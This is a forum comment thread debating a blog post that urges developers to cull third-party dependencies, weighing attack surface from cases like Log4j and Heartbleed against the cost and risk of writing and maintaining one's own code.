Cull your dependencies
tomrenner.comI don't think there's an issue with depending on libraries that are big. If the library is just a big bag of classes from which you cherry-pick the ones you need, then the extrapolation on the number of bugs as mentioned in the article under "By the numbers" is meaningless. Why care about bugs in code you don't use if it doesn't even end up getting linked into your program? In modern languages like Go or Rust, it will most likely not even compile the code you don't care about, assuming it lives in separate packages/modules.
What's a lot more problematic is if you use libraries that don't allow easy cherry-picking. For example, Log4j has a very simple API à la log.print(), but that thing almost acts like a portal into another universe. Strings can contain a whole bunch of modifiers or tags that cause the library to do many special things that are enabled by default. Those libraries are just poor in taste.
Don’t be so sure. Large libraries often aren’t well-separated and so you end up not being able to strip as much as you intend (unless there’s an explicit design goal that’s somehow enforced to keep things in isolated components). If you can’t strip, that means there’s a dependency somewhere which means you may end up exercising code you didn’t intend. Log4j is an extreme example and generalizing from it to all libraries is bad engineering but paying attention to dependency graphs is a good idea even if people will continue to ignore the problem.
OpenSSL is everything and the kitchen sink feature creep. Their development and architecture methodology are nil.
HeartBleed, Spring4Shell, LogJam, Struts, Jetty and many more beg to differ.
More LoC is always a greater attack surface, regardless of development trustworthiness.
Minimize code ruthlessly.
The corollary to "Minimize code ruthlessly" is "Roll your own X". Sure Heartbleed was bad, but are you going to write your own TLS library?
IMO, the OP post has an unfounded sense of hubris. Everyone else's code is bad except for me, who only writes minimal code with no exploits.
Libraries are generally larger because they are usually written for more use-cases. If your program is only referencing a small portion of a library, then rolling your own doesn't mean rewriting the library. Your code will be more minimal because it's only written for your program.
Assuming you're fallible and write code with exploits like everyone else, your program will probably have different exploits from mine. An attacker won't be able to target a widely used library and enjoy being able to pick from several targets. Instead, they'll have to tailor an attack for your code base. Each exploit found yields less of a reward, which will frustrate less motivated attackers.
This comment inflates the upside risk (risk that every developer reinventing the wheel creates lower chance of hack of their code succeeding) and discounts the downside risk (the increased costs associated with elimination of specialization/consolidation of code into reusable libraries).
> Instead, they'll have to tailor an attack for your code base.
This misstates the actual threat.
Assume detection of exploits is automated (even if it isn’t completely automated now). Assume exploit code is modularized and passed around on hacker markets, because they are.
Your recommendation only increases the cost to exploit by a small factor, but it also increases the inevitable costs of legitimate usage by possibly a much larger factor (patching the inevitable bugs which are found). Because developers aren’t specializing (in how to efficiently+safely write logging code) bugs both in the designs phase and implementation phase will be higher than in a counterfactual specialization world.
This is just security through obscurity. It's no different than skipping password-hashing because you think you are too small be attacked (after all you can minimize one more dependency). It works up until the point your business is actually worth anything.
Libraries are not only larger because they are written for more use-cases, but also because they cover more tested edge cases.
> The corollary to "Minimize code ruthlessly" is "Roll your own X". Sure Heartbleed was bad, but are you going to write your own TLS library?
But using "don't roll your own crypto" doesn't generalize to using every possible library to avoid writing any code. Down that path lies the madness of leftpad.
Crypto and security protocol implementations are exceptionally difficult to write in a way that avoids all exploits, so, yeah, don't write your own TLS library unless you're willing to fund a team of all the necessary experts which is going to be very difficult.
OTOH a very large number of libraries implement simple things in overly complex ways (sometimes by necessity because a library needs to try to be all things for all people) and can be very easily replaced by small amounts of code that do only what my product needs.
Every third-party library you add is an additional source of bugs, unmaged surprises (e.g. they decide to break their APIs for the lulz), attack surface and constraints. It is wise to weight the benefits against the drawbacks for each library individually before making it part of your code.
My counter-point is twofold. Everyone understand not to roll your own crypto not because developers intrinsically know crypto is hard but because of sustained marketing by cryptographers. It's an easy counter to point to when people swing too far into NIH. Following that I think a lot of people don't realize when they are in over their heads; it happens a lot in software estimation. It's easy to look at something like logging and say "I can just write printf, why does logging-library-x have so much bloat" without realizing how complex a good logger can get. Software architecture is judged by how easy it is to maintain over time; what is small amounts of code today can easily balloon into something unmanageable.
At the same time, there's a lot of hubris that goes into the statement "Every third-party library you add is an additional source of bugs, unmaged surprises", but somehow the code you write was typed by God himself.
Everyone points to leftpad madness of dependencies despite the fact that the dominos leading up to leftpad was the work of one very dedicated individual. Despite other languages having the same kind of simple dependency management never having anywhere close to the same issue (like Ruby, on which npm was based). Regardless, the OP doesn't use leftpad as an example; he uses log4j. I agree that log4j had insane defaults, and that's on the maintainers, but the implication is that you should roll your own logging facade and that's something where I wouldn't want to work on a project where all the logging is done through printf (except in probably an embedded environment) or maintain an in-house logging library because the original writer thought it would be "just small amounts of code".
> At the same time, there's a lot of hubris that goes into the statement "Every third-party library you add is an additional source of bugs, unmaged surprises", but somehow the code you write was typed by God himself.
You (everyone) should't allow hubris to drive these decisions, instead make an objective evaluation.
If you're going in saying "I can write this same functionality better than anyone else so I'll just do it", stop and rethink.
Every line of code (to an approximation) adds more potential bugs. So if you pull in a library with a million lines of code, you've added that level of magnitude for possibly future bugs. If you actually need most of those million lines because you use all the features, then you need them. In that case it would be hubris to assume that you can write the same but slightly different million lines and do much better. You can't.
But as other subthreads here point out, often you really use like a thousand lines out of that million line library. If that's you use case, you can reduce your attack surface by 999000 lines of code by writing a few functions of your own, customized to your needs without any unused frills. You don't need a god in your staff, just someone who values the reliability and security that simplicity brings.
> unmanaged surprises
To unpack this statement, I meant that when using a third party library you are now subject to their schedule and roadmap over which you don't have any say or ability to manage it. They might drop a feature you need, or break APIs in a minor release, etc. This is undeniably true, so must be taken into account when doing a risk analysis on depending on some library. Well-run libraries offer a stable platform but tons of libraries are not well-run from a release engineering aspect. Choose carefully and know what you're getting into.
"Don't use OpenSSL unless you absolutely have to. Preferably, disable every other feature you don't need. And keep all of your vendored dependencies up-to-date."
He's not comparing quality, as much as quantity. Building a small utility function, general enough for your intended use, brings in less code than adding a library dependency. That's the argument.
TLS is an example of when you probably would not make that trade-off, but there are lots of other examples where it would make sense.
Sure, but the parent post is about logging - which isn't a small utility function. `printf` works for scripts up until it doesn't. When you start needing structured logging, log levels and you are debugging performance issues because of logging you start to understand why that complexity is put in place. Leftpad? Sure that's extraneous. But logging?
Yes, of course. Unless you absolutely have known working pristine code free of side-channels for SHA3, ChaCha20-Poly1305, etc. don't even think about it.
The same goes for parsing and other complicated operations containing pitfalls.
Honestly, I hope most crypto, parsing, numerics libs, and OS kernels and drivetd were rewritten in Rust and given C, C++, etc. interfaces.
The intended way to look at this is, “When I write code, I know what I wrote and the processes in my team (should) ensure other teammates know it as well”.
But what’s the back pressure to this advice? If I need to multiply matrices should I write my own to avoid including MKL BLAS? What’s the heuristic that determines when a dependency is worthwhile?
I have written a matrix multiplication lib once because I had some a priori about the data and could remove half the operations.
Everything has a cost (usually in time) and everything comes with trade offs (usually a different set of bugs). Not-invented-here comes with a gigantic upfront time cost and a larger set of bugs. The best heuristic depends on what you’re optimizing for. There’s never an easy answer.
As usual, it depends. A naive matrix multiplication function is pretty simple. If that's all you need and can do with sub-optimal performance, I'd write my own.
It’s less about lines of code and more about scope of functionality.
> Minimize code ruthlessly.
Minimize functionality ruthlessly.
> More LoC is always a greater attack surface
More… than what? What does the counter factual look like?
If I only care about 1 application in a vacuum, reducing LoC is not terribly difficult. If I run my application on any modern OS, I depend on thousands of applications, daemons, libraries, and a kernel. I would far rather their developers take reasonable efforts to import common libraries when appropriate. The aggregate LoC of an ecosystem is more important than the LoC of a single application.
Also, telling people the metric of relevance is LoC is wrong and will lead people to game the metric, losing sight of the actual goal of code quality. There are infamous examples of Perl code golf; they optimize for LoC, but aren’t at all useful for code quality or security.
Far better to expand LoC a reasonable amount in favor of developer readability and to reduce complexity.
I'll say the quiet part out loud: nobody got fired for using a dependency with any of these bugs, and nobody got promoted for not doing so.
Obviously, pulling in something like left-pad is worthy of derision. But generally you should pull in whatever dependencies let you go faster, and minimize the amount of time spent planning for black swan events.
> Why care about bugs in code you don't use if it doesn't even end up getting linked into your program?
If things are segmented in ways such that you can automatically tell that you're not impacted by a bug, cool.
A lot of log4j emergency deployment pain in BigCos had to do with the limitations of tools that could discern whether you weren't impacted, because security vulnerabilities of that magnitude aren't an area where "probably not" is good enough. I wouldn't really be comfortable with "it's fine that my <bank/surgeon/cloud provider> uses a framework with massive unpatched vulnerabilities, they're very careful to hand-pick classes to import that are safe".
(modulo the security of real world banks/surgeons being, uh, less than ideal, and all of my PII probably being accessible from some wordpress endpoint somewhere)
It would be nice if there were a way to quantify the value of your dependencies.
If you have a dependency with 1,000 LoC and your application is utilizing 800 of them, that seems like a good reason to use the dependency.
You're (hopefully) getting unit tests, documentation, and public exposure of the code (bugfix opportunities) for "free"
If you have a dependency with 1,000,000 LoC and you only need 1,000, that indicates the dependency isn't a good fit for your project.
This is only a heuristic, but are there any tools that examine metrics like that?
This makes me think about the quality of the dependancy. If you could evaluate packages for things like:
* Test coverage -- that's not a metric on NPM * Code practices -- what's the review history * Issue velocity -- hard metric, lots of features vs fixes * Hygiene -- for many languages is typing enforced / validated
I'm sure there are lots of other metrics, but so many times you're just evaluating two packages based on "star count" or "npm installs".
Agree that this is the largest issue with code quality.
Knowing when and which package to import, given the incomplete data points we have now.
Stars/downloads are a popularity contest. At some point, people mostly vote for the candidate who is most likely to win (causing this to be self-reinforcing) , not the one with the best ideas.
The stability+sustainability of the development team, the signals of consistent quality (eg. Code linting, code quality audits, bug bounty program participation, public security audits, good design documents, automation of builds, testing methodology and test coverage).
Factors for me are: 1. how hard will it be to remove/replace this package in the future? how much coupling does it introduce? 2. how likely will it be that this is deprecated/unmaintained in the future
You're also exposing yourself to potentially needless breaking changes and many libraries that aren't well tested or don't have static types. Or growing in size because of optional dependencies but build tools and languages without builtin support for keeping unneeded optional dependencies out of the imported code.
This seems like an ecosystem cultural problem. In Python, I can't think of a single time I have experienced an "uncontrolled" breaking change (i.e. without an announcement and long deprecation period) in any important library that wasn't in some kind of alpha state, and I've never needed to rely on an alpha-quality library for anything in production.
It's not a way of detecting it but what about dead code elimination, like Javascript's tree shaking [1]?
Of course if your dependency is a spaghetti, tree shaking wouldn't do much but neither would an analysis tool. Poorly architected code with no separation of concerns, will cause every entrypoint to touch every LOC
[1]: https://developer.mozilla.org/en-US/docs/Glossary/Tree_shaki...
Tree shaking could help, but an issue is that in bigger libraries there will often be shared abstractions that wouldn't be present in a more targeted implementation. Even libraries that are well architected and have good separation of concerns.
Unless the library is a collection of independent functions like lodash, there will be some interdependency (in the name of code quality!).
Of course, (ab)using "more targeted implementations" can cause other problems, like using too many libraries for example. No silver bullet.
How much time would it take to replace those thousand lines? A week (assuming well tested and production-ready is a requirement)? If keeping it costs a couple hours of debugging once a month, the return on that week would take years to turn positive.
> This is only a heuristic, but are there any tools that examine metrics like that?
Use a code coverage tool to see what call paths are getting exercised.
Wow okay I'd be highly interested in such an analyzer as well.
I think a lot of naysayers here are missing the point:
> The underlying Log4J library is 168,000 lines of code.
I would find it difficult to invent a logging system so exotic, even if somebody paid me to. People are ignoring the incredible size of their real footprint. My 4000-line microservice is actually my 3,000,000-line macroservice and every single one of those lines is a potential trouble spot for security bugs and myriad other issues - memory issues, startup issues, compatibility issues, on and on...
In fact I would argue that confusion about exotic open source frameworks leads to wrong assumptions in which people figure "oh I think the framework takes care of that" when in fact they have a massive problem they don't understand. Even when the security bug is documented it's incredibly hard to figure out which releases are affected, which releases are fixed, and so on - of course it shouldn't be, but it always is.
You can try to argue that "I'm only using this one part and I should be excused!" but that never works in practice. One function call can traverse the world before returning. Many frameworks quietly do all sorts of things during bootup without one's knowledge - it's sometimes mystifying how the dang thing managed to wake itself up and unleash havoc in the first place.
The counter factual might suffer from Chesterton’s Fence. If you don’t know why the framework implemented “all sorts of things during boot up without our knowledge”, why do you believe that you wouldn’t need to do something similar if you were to rewrite similar code.
The core problem is the knowledge handoff of a library/ framework maintainer. An end user should be able to identify whether the library gives them enough specialization value or whether substituting it for a little elbow grease is “worth the squeeze”. In practical terms, it is always an unknown and depends on the quality of the end developer x the complexity of the task.
> The counter factual might suffer from Chesterton’s Fence. If you don’t know why the framework implemented “all sorts of things during boot up without our knowledge”, why do you believe that you wouldn’t need to do something similar if you were to rewrite similar code.
I really hate those though-terminating cliches HN loves to drop from time to time. If your Chesterton's Framework (or library) is doing anything important at all during boot (or at any time, really), it should be very well documented or extremely obvious, otherwise it's a huge security risk, period. "Random Chesterton Fence shit happening" is how we got Heartbleed (did we really need the heartbeat?). It is how we got Log4Shell (did we really needed arbitrary access to servers?). It's how we still get lots of weekly Wordpress CVE.
About the "rewrite" part: the irony is that people who would be able to "rewrite similar code" are the ones who do actually know what frameworks do during initialisation. Notice that I said "be able" instead of "dare". That's because actually writing this kinda code is non-trivial and requires previous knowledge and study.
The scenario where a person is actually able to rewrite an important part of a framework that is actually production-ready without knowing what it entails beforehand is completely unrealistic.
The story of the mythical cowboy coder that managed to accidentally reimplement Rails at work is just that: a myth. What the mythical cowboy coder most certainly created was a simulacrum of a Framework. It probably has lots of useless OOP patterns, but deep down he's using Sinatra's router, and his "ORM" (if it's really an ORM) is just a wrapper around ActiveRecord. Why? Because writing a Router and an ORM are hard. Faking structure not so much.
It's frankly tiring that lots of people jump to those absurd arguments to defend the abuse of third-party dependencies as if it were mana from heaven made with the utmost care. It's not, we have to be realistic: lots of them are absolute shite.
I was immediately reminded of this gem from https://www.joelonsoftware.com/2001/10/14/in-defense-of-not-...
“You know their motto? ‘Find the dependencies — and eliminate them.’ They’ll never go for something with so many dependencies.”
> If you have customers, never outsource customer service.
Hopefully, every business has customers?
Yes, exactly. That’s the point.
I think that’s the joke.
Yeah, after the two comments from you I re-read it and finally got the punch line :)
It's a good advice but it has a cost. Where is the discussion about cost?
The product with less dependencies will live longer and give you better flexibility but it will cost more to build and more to maintain (incl. onboarding new engineers who need to learn their way around your custom stdlib+). It's a balanced choice but the stakeholders are not prepared to invest more. Furthermore, if the project gets cancelled, there will be all that library code investment that will be sunk.
It's not that '... developers ... are lazy, and prefer to write as few lines of code as possible, sticking rigidly to the principle of "not reinventing the wheel"'.
They don't do that because they are lazy. They do that because of competitive pressure. In SW development, in most cases, particularly in enterprise development, "the fastest person wins". Whoever moves fast and delivers fast will get to do more projects and have more influence over direction of projects. "Not reinventing the wheel" is of course in vast majority of cases faster than reinventing it.
Because in most cases it's not important to write the best possible code, it's to write "good enough" code, on time and on budget. Insecure code is of course not "good enough", so competitive pressures will adjust accordingly.
That’s assuming you move faster with a given dependency and that there isn’t some non obvious mismatch between it and what you try to accomplish.
Reinventing the wheel is also decidedly unfulfilling.
“Fulfillment” in a developer’s programming tasks is not a valuable work product. Choosing whether to reinvent the wheel or not is ultimately a business decision that too many developers internalize.
If your product team and management team are blindsided by tech debt or liabilities that you add to the code base because you decided to quietly roll your own crypto (or any other OWASP vulnerability), you are substituting your short term enjoyment for the livelihoods of your coworkers.
Companies who make their developers do stuff they feel is pointless will not see all that much "valuable work product" either.
There’s a natural bias to prioritize near-term cost over long-term cost, which translates to there being a bias to just add yet another dependency. The advice is therefore to be aware of that bias and to actively work against it to counteract it. Of course, the involved trade-offs need to be considered to strike a good balance. If the stakeholders don’t enable you to strike such a balance, personally that would be an important reason to quit that situation, or to take care to not get into it in the first place.
Not everybody thinks that maintaining your own code is eventually cheaper and safer than adding a mature dependency.
Nobody said that it would. You’re putting up a straw man.
> will cost more ... to maintain
This is a reasonable and popular intuition, but for an enormous class of projects it turns out to be torturously false and a poor reason to choose dependencies.
How many times have you sat down on Monday to fix a bug in your product only to discover DoohickyLib 3.3.2 is no longer building correctly with the toolchain update that you just pulled in. So now you go to DoohickyLib's github page to see if it's been addressed yet.
You find that someone else reported the issue last week but the maintainers use a different toolchain themselves, and don't think this is a priority, and so they pushed back on the reporter to submit a PR if it's important to them.
Unfortunately, the reporter isn't experienced at contributing to open source and doesn't want to contribute. After a bunch of other people post "me too! when is this getting fixed?", some generous soul finally contributes a PR that should do the job.
But the maintainers are on vacation or just sick of this issue and don't respond. Finally, they reappear but aren't satisfied with the PR, so they push back on the contributor. In the meantime, that contributor just transitioned to their own fork and aren't tracking the issue anymore. So the issue has been tracked for a week and has 30 posts, and somebody shared a functional fix, but it still isn't merged and DoohickyLib still doesn't work with the toolchain you use.
It's now 1pm on Monday and you've spend most of the day trying to track down the issue and understand its status. You think about whether you can table this work until later in the week hoping that the fix gets merged into the mainline of DoohickyLib, or whether you should switch to a fork. But there's a lot of overhead to that, especially if you're on a team and need to run those kinds of ideas past a PM.
Blah, blah, blah, etc, etc, etc
This is what "maitenence" tasks look like when bring dependencies into your project. They're not really related to your project, they're not really something you have good control over, they don't feel like engineering, they often come up out of nowhere, and they're often showstoppers.
The truth is that it's very hard to anticipate where your maintenance burden will come, but when you choose to use a lot of depdendencies, you're not necessarily reducing that burden but you are making a profound choice about what it looks like.
Very much this. An external dependency gives you the free puppy, but the ongoing work is still yours.
One of the items, as you describe, is that external dependencies introduce unpredictable change on a timeline which is entirely out of your control.
A particularly annoying example that has happened many times is there is an exploit in library A which is now fixed in the latest version so we much upgrade. Oh but the latest version also bumps the dependency of some other library it uses to a version that removed a key feature we need. Infosec says you must fix the vulnerability immediately and of course the product team isn't willing to compromise on the feature loss. Oops. When you own the code you own these decisions.
Of course, some library projects are run very professionally and maintain a strict observance of compatibility within major releases, a long deprecation announcement process and so on. Other library projects, not so much. Definitely favor depending on the first kind and avoid the second kind.
> but for an enormous class of projects
> with the [latest] toolchain update that you just pulled in
In my experience, larger projects tend to be VERY conservative with toolchain updates. For example, I have Java JDK 8 (2014), 11 (2018), 17 (2021), and 18 (2022) installed; the larger projects are on JDK 11 or are just migrating from JDK 8 to JDK 11. Newer, smaller projects are on JDK 17, and only experimental projects use JDK 18.
> Unfortunately, the reporter isn't experienced at contributing to open source and doesn't want to contribute.
One more reason not to chase bleeding edge but to stay on LTS instead.
Bottom line, I am not removing Google Guava or Apache Jena from my projects because of a few CVEs they may have every few years. I am not sure I will write more secure and maintainable code. And even if I did, would the stakeholder really benefit from that?
And it will cost vital time to market. I am very conservative about introducing dependencies but there is a reason why they are proliferating and it is not just developer laziness.
Here’s a very good take from Joel Spolsky:
https://www.joelonsoftware.com/2001/10/14/in-defense-of-not-...
Not everyone has the resources of a Microsoft, though.
I agree that for core parts it matters. But quoting the post by Joel:
"If you’re developing a computer game where the plot is your competitive advantage, it’s OK to use a third party 3D library. But if cool 3D effects are going to be your distinguishing feature, you had better roll your own."
There’s also a cost to using an external library. For example bad maintainers, project being abandoned, project having breaking changes, dependency ballooning in size.
It is an optimization problem, and any strawman argument based on the alternative endpoints will be flawed.
It is also very difficult to measure the mitigation of issues caused by reducing dependencies and exposure to their issues. If you try to measure it, you'll wind up only seeing costs, and will wind up using all kind of dependencies up until you start seeing how hard it is to maintain your own CI and then you eventually get log4j'd.
> It's a balanced choice but the stakeholders are not prepared to invest more.
Well, that's not how "balanced" looks like.
Anyway, a lot of quality-driven activities pay out well within the initial development of a project, on what case, it's not a balanced choice anymore, it's a complete no-brainier. Still, I'm yet to see money-oriented stakeholders accepting those.
Build & support vs. buy or use
The cost of maintaining and supporting beyond simple cryptographic primitives is too steep for most projects.
Having been burned early having to support an application with rotting dependencies, I tend to feel this. In my Python applications, I make an effort to use the standard library solutions over third-party ones whenever possible, even when they might not have all the features I want. There are however occasions when I must use third party dependencies, and some of them give me hell (e.g. dependencies that refused to install with a simple 'pip install X')
It is a fine balance. Good luck doing that in JS which has zero standard library on the browser.
C#, for example is in better shape and you can do a lot before you reach for nuget for anything outside of Microsoft.
I prefer to not import tiny libraries but adopt the code into the codebase.
> Good luck doing that in JS which has zero standard library on the browser.
The article is saying something more like vendor your dependencies (and cut out the stuff you don't use within dependencies).
> I prefer to not import tiny libraries but adopt the code into the codebase.
Yep that's what the article is saying.
I don't get why people find vendoring valuable. If you vendored log4j, you'd get the same exact bug in your vendored version, and you'd need more work to pull in the fix.
Perhaps people imagine that if they vendor they'll review all the code they pull in, but I've never seen it happen in practice beyond "LGTM". It wouldn't have found the log4j vulnerability, and could overlook even intentionally malicious code if only the source looked innocent-enough at the first glance.
Why are so many people using log4j or any complex logging library in the first place?
If it weren’t for C#, we’d have a much harder time doing business with our banking customers.
When it comes to vendor due diligence time, we only have to write a single 3rd party’s name into that box. Every one of our customers mutually trusts Microsoft too.
We’ve been at it for over 7 years now and we still only “depend” on Microsoft. Even stuff like SQLite falls under the Microsoft.Data.* scope these days.
The browser has one of the most extensive standard libraries out there.
> JS which has zero standard library on the browser.
Could you explain what you mean by a standard library or by zero? :-) Or, more to the point, what are the specific things that you would add to JS standard library that you find missing in the browser?
Consider the latest release of an evergreen browser as a reference point.
(I know about date manipulations. This should be addressed by the Temporal proposal that's already at stage 3. What else?)
The problem is that when you write the functionality yourself, you’re likely to be subject to the same number of, if not more, bugs per 1000 lines as mentioned in the article, especially if the project has a deadline to meet. Using unnecessarily bloated libraries might be a bad choice, but in general I think it is indeed a good practice to use libraries that are widely adopted and well rated in the community.
Also not sure if the Java world and JS world are that different to the rest, though in the community of Elixir which I work with, “bloated” libraries are practically nonexistent, which I think should be similar for most functional languages.
The first thing I look for when starting a new project is if I can't be served by the standard library in whatever lang I'm using, to find dependencies that don't also depend on a bunch of code that I will have to indirectly depend on. The code I wrote like that still runs like ten years later without much problems having to update it. The code I worked on which depended on whatever flavor of the year framework people were hyped on for no good reason is rotting.
Absolutely. This is where the real dependency bloat in ecosystems like npm come up. You may only include a handful of reasonable dependencies, but each of those have dozens of their own dependencies, and so on and so on.
This is true for [probably all] frameworks? If I develop a microservice using Spring Boot, dependencies are inevitable.
However, I think the blog post reflects a strong desire of many developers (I am one of them.) Achieving this vision, at least in commercial software, can be a utopian dream.
I'm super allergic to the nodejs ecosystem, it's so bad.
I also get away in my professional life using it for pretty much nothing and it's great. There's a reason Ryan Dahl moved on to Deno.
People who think it's somehow necessary or integral to getting a website going are deluded hypebeasts.
I think it's missing a bit nuance.
Dependencies can be very good, they can provide enormous leverage to actually solve your problems and share the burden of common problems like parsing a json string or compressing to gzip or whatever. In theory at least.
On the other hand, I think a large part of the problem actually comes from dependency managers being a bit too good. It's easy to pull some library and not realize the dependency has massive root system of transitive dependencies, and once that gets settled in your code base it may be difficult to get out.
I think the real problem isn't dependencies themselves, but when dependencies are expected to have dependencies in themselves. I don't think what you get in the end is good, robust software. It gets a sort of flimsy quality where stuff keeps breaking and falling apart and that's just the way it is.
Dependencies for areas I have no knowledge, experience, nor desire to learn are no vice.
Dependencies where I know the domain are borrowed time (sometimes with bombs attached) with mild virtue.
If hell is other people, debugging other people’s code is double-dog hell. Triple-dog hell if they’re unresponsive or in a significantly different time zone.
Not only for security reasons, anybody who has ever maintained a large codebase with external dependencies for enough time knows the pain it is to handle breaking changes in the underlying libraries without breaking your own public APIs. Sometimes you even have to embed multiple versions of the library to be able to still use it's legacy elements. So yeah 100% agree that each dep should be scrutinized.
The truth is that the world generally doesn't give a shit about software quality. Developers are expensive and business models shoddy. You have to be quick, otherwise the competition makes the race.
I for my part have given up and go with the flow. Who cares if Hibernate creates a million queries in the background. Hey, it works, so ship it!
Is the health safety and wellness of your user base important to you? "Who cares" matters when your userbase gets fucked over because you didn't.
To us developers, maybe. To our managers? Definitely not. As long as the GDPR fines are cheaper than the alternative, no one will care.
I'm really glad I don't work in a company like that.
"Invented here syndrome" is a real and pernicious problem.
I think it probably depends on the size of organization.
NIH is a problem in old and large organizations, which actually have a large roster of homegrown solutions.
On the flip side, I feel a lot of smaller organizations have the opposite problem, like a weird phobia against nontrivial code. Like you need a special license to implement a bespoke data structure or some graph algorithm.
Applying a blanket rule like this is always wrong. It makes sense in prototyping to have a good mix of pull-vs-make. Make the small things that are easy to do, and pull the things that make you more productive, even if they are huge.
Maybe during maturation, each dependency should be "vendorized" as much as possible. Fork it, find an internal maintainer. I suspect that very quickly nobody will want to pull in a lot of dependencies any more, and miraculously a much smaller, much more specifically-suited codebase will appear to solve the very small subset of problems you actually need to solve right now (rather than all problems the dependency could solve).
But ultimately: "If it’s a core business function — do it yourself, no matter what."
The assumption of 15-20 errors per 1k line of code can't hold for the most used libraries. Incidents like the Log4j mess are memorable because they are rare. I bet people have been crawling all over similar logging libraries for other platforms now, looking for similar problems.
Good luck not adding dependencies. What's the alternative? Maybe some of the dependencies can be avoided without cutting functionality. But really only by two methods: Either there is already another dependency doing the same work, or you implement it yourself. In the latter case, chances are that the code will be less mature.
One other area that can be complicated surrounding dependencies is licensing. Specifically, you use a library imported from PIP/NPM/Maven/NuGet/etc. and maybe, if you are a diligent dev, you review the license. If you're lucky it's MIT or some other compatible version for your use case. But did you review the dependencies of this new dependency? What about their licenses?
Okay, now fast forward a few years: is the open source dependency still [original license flavor] or is the license now more restrictive? What about the the updated dependencies of this single, imported dependency?
Now suppose you have an executable that's made available: do you properly have the accompanying license files that (on a minimum) give attribution?
Generally speaking, we import dependencies to help make things better and to get back to get focusing on the main portion of our application. At the same time, each imported dependency has an ongoing management factor.
...and don't get me started on the diamond dependency problem which still exists despite any given package manager's best efforts and is one of the reasons we have SemVer which we hope is followed by the developers of that dependency.
Rather than reviewing any licenses, you should incorporate a license check in your build. I did this in a Gradle project recently, and it was pretty easy:
https://hg.sr.ht/~twic/lambda-property-matcher/rev/53ef7eb30...
Why make it so difficult? Just make your project AGPL and stop worrying about other OSS license compatibility.
Because i'd like my software to be useful to normal people.
Because AGPL implies many things not all developers want associated with their project?
Yes, due to their virality, GPL-flavored licenses tend to be the "top type" that you can just cast the top-level project to and call it a day, but try convincing your corporate boss to AGPL your money-making product. That's gonna go about as well as is predictable.
Then that's not the company you want to work for.
AGPL isn't even compatible with GPLv2, so you still have to worry about OSS license compatibility. So given that you have to worry anyway, you might as well pick a less obnoxious license.
I think culling dependencies is smart, but the selection of which to cull (or at least consider) is a high art.
Does this dependency generate a lot of vulnerability issues? How stable is it? If it has a high change velocity, how stable is the API or whatever portion you use?
At a previous job, someone was advocating for this repository software which I shall not name. I did a Visio diagram of all of the major things on which it depended: Solr, Ruby on Rails, and so forth. It looked like the Tower of Babel. I then colored the blocks in this tower in if that project was written in a programming language we didn't have expertise in.
Well, they went with it anyway. The job is in the rearview mirror but consultants continue to work on this project.
Frankly, the dependencies in the project alone were enough that one would need a reasonably-sized team to even consider it, much less the paltry number of bodies we had to throw at the problem in the middle of all of our other tasks. Don't get me wrong -- you can build amazing things by stacking together predefined blocks, but life is always going to try to Jenga that tower you have created.
> When a new package is added to the codebase, demand full justifications about why it is required, and record the reason for the addition in a log within the repository.
I think this is actually good tip that doesn't get used enough. Logging dependencies and packages would probably also make it a lot easier to debug if you suspect a package is the source of a problem but don't know if you can touch it or not.
Likely worth a read for those that found this interesting is Russ Cox's article on dependencies, Our Software Dependency Problem, at https://research.swtch.com/deps. This post is a bit more detailed and balanced in my opinion.
> which at a conservative estimate gets us to 1M lines of code in the imported packages. This is roughly the size of an entire operating system.
Operating Systems are way bigger than 1M lines of code. Even in the link he gives, the smallest "OS" is 2.4 million lines, and that's actually the Linux kernel from 2001. The true smallest OS is Windows NT in that link, at 5 million lines of code iirc.
Don't make false comparisons. An operating system hasn't been anywhere near 1M lines of code for almost 30 years. They are now over 500M lines of code! The kernels alone are way larger than 1M lines of code. If you're going to make a comparison, use a real comparison instead of making stuff up and then providing a link that immediately disproves yourself.
There is always balance with reinventing the wheel. Plus, a custom library often gives way more technical debt than a standard one. Less battle-tested, fewer tutorials, very often a lot of idiosyncrasies.
A few times, we were going a different route:
We use libraries if needed, but after some time, we pruned ones from which we used only a few functions/classes. That way, there is (almost) no delay in development, but there is this process to keep things clean.
The converse is much more challenging. Writing a lot of code then discovering one is effectively reimplementing an existing library, which took quite a few person-years.
Just like the 30 million line problem by Casey Muratori: https://www.youtube.com/watch?v=kZRE7HIO3vk
Experienced smart developers are really careful adding dependencies to a project. Spending time evaluating the value/cost equation. Beginner developers copy-paste code they don’t understand from Google searches and add 10000+ transitive dependencies they also don’t know without even thinking about it. They haven’t yet been badly burned from too many dependencies not being maintained, bugs not being fixed and updates breaking your code.
Good: Libraries are leverage; as with financial leverage, use wisely to optimize results. At best, a library will be well tested, heavily reviewed, battle-proven code, and therefore worthy of trust.
Bad: Sometimes we convince ourselves that because a library has a large download count, it must be of high quality, and written by people far more qualified than ourselves. Sometimes this is true; sometimes a popular library is written by whoever was willing to write it first (and therefore grow adoption), which might not correlate with the other desirable properties.
Ugly: library authors naturally tend to be quite pro-library, more than the average developer. So they tend to bring in dependencies in unexpectedly large numbers. Your transitive dependency graph can grow unexpectedly large (especially in the npm ecosystem!). Your project can turn into the xkcd cartoon we are all thinking of, a tall tower built on some fragile bits you didn’t even know existed.
The claim is wrong that there are only 168,000 lines of code in this thing.
Here is a raw line breakdown, from the latest source tarball:
.java 313,314
.xml 53,442
.properties 5,800
.md 4,130
.json 2,586
.yaml 1,178
.yml 780
nil 762
.tld 634
.sh 531
"nil" denotes unsuffixed files.One of the pains I've experienced over ~1 decade as a professional SWE is that a lot of dependencies aren't really maintained. Many of the times I've diagnosed an issue in one of our dependencies only to find that the maintainer isn't really present or interested in upstreaming.
Many companies are uninterested in forking and maintaining their own version either
All of my points have already been stated.
The author’s heuristic is too simple.
Simply rolling your own is not smart because there is a lot of detail (planning, implementation, testing, bug reporting, updating to work with different browsers/OSes/locales) that someone specialized in creating. If you are sure you don’t need to benefit from that specialization effort, it might be worth it to roll your own.
On the other side of the ledger, there is a lot of uncertainty in choosing the right library, predicting when upstream changes might cause you heartburn (eg. short notice broken API) downstream. Also, predicting what hidden features the libraries have that you don’t want or need (log4j’s formatting RCE, Java Spring-Web deserialization) or how mature the library’s development/testing/maintenance is.
Making these data points more standard and transparent (is this part of “software supply chain bill of materials” proposals?) might help better inform these decisions.
The argument seems a bit myopic. The author is talking about errors and vulnerabilities found in libraries while ignoring those same factors in bespoke code. At best that's a "security through obscurity" scheme.
The problem with libraries is that they often contain so much functionality while you yourself might only need a single thing (and don't even realise all the stuff the library is able to do). Whenever I had to patch systems due to some vulnerability my first thought was "Wait, why the hell is a <xxx> library even able to do that?"
